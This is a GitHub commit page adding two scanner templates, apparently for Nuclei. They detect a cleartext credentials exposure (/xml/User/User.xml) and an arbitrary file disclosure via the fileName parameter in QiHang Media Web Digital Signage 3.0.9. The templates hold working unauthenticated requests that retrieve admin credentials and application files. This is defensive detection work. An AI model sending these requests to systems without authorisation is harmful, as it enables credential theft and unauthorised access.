Merge pull request #2794 from gy741/rule-add-v63

Rule add v63
patch-1
Prince Chaddha 2021-10-01 16:30:47 +05:30 committed by GitHub
commit f7533d4d89
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 58 additions and 0 deletions

View File

@ -0,0 +1,23 @@
id: qihang-media-disclosure
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure
author: gy741
severity: critical
description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php
tags: qihang,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/xml/User/User.xml"
matchers:
- type: word
words:
- "<?xml version"
- "<Users>"
- "account="
- "password="
condition: and

View File

@ -0,0 +1,35 @@
id: qihang-media-lfi
info:
name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
author: gy741
severity: high
description: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
tags: qihang,lfi
requests:
- raw:
- |
GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
Host: {{Hostname}}
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "filename=QH.aspx"
- "application/zip"
part: header
condition: and
- type: word
regex:
- "QH.aspx.cs"
- "QiHang.Media.Web.QH"
condition: and
- type: status
status:
- 200